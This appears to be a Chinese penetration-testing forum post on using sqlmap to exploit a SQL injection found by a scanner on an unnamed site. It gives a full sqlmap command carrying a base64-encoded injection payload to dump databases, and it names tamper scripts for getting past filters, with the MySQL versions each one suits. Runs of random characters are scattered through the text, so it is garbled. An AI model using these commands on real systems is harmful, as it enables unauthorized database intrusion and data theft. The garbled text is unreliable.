WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?5 X) H8 @# v4 W6 q' ?- p% _ 9 S R- H Z- t* Y+ h sqlmap的tamper里有个base64encode.py 使用如下 4 b2 o1 h k5 L Q V sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs$ R* C: \" l1 i/ j/ J sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”# Q5 o5 z% S) b9 t2 ^( ` 其中常用到的bypass脚本绕过SQLMAP主要两个脚本:% ]6 k) t5 K# _& U) `% G! ], j , K% J* o/ K* j( [1 p# e space2hash.py ,对于MYSQL数据库 4.0, 5.0注入5 }) M9 u' X* |0 z3 _5 H space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入( V2 |+ J! f$ K( i; N9 U 首先确定目标数据库版本,然后选择相应的脚本。 -v 3 --batch --tamper "space2hash.py"- i0 s' ?/ z1 \- l5 d# C 3 l* t& ?9 m: I5 `5 f' _2 f 还有其他一些插件: encodes编码 ——charencode.py" |: \/ o9 |; Q$ I: [ base64编码 —— base64encode.py 替换空格和关键字 —— halfversionedmorekeywords.py. ~& N* @$ U/ H ?. N% p0 m# C |
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |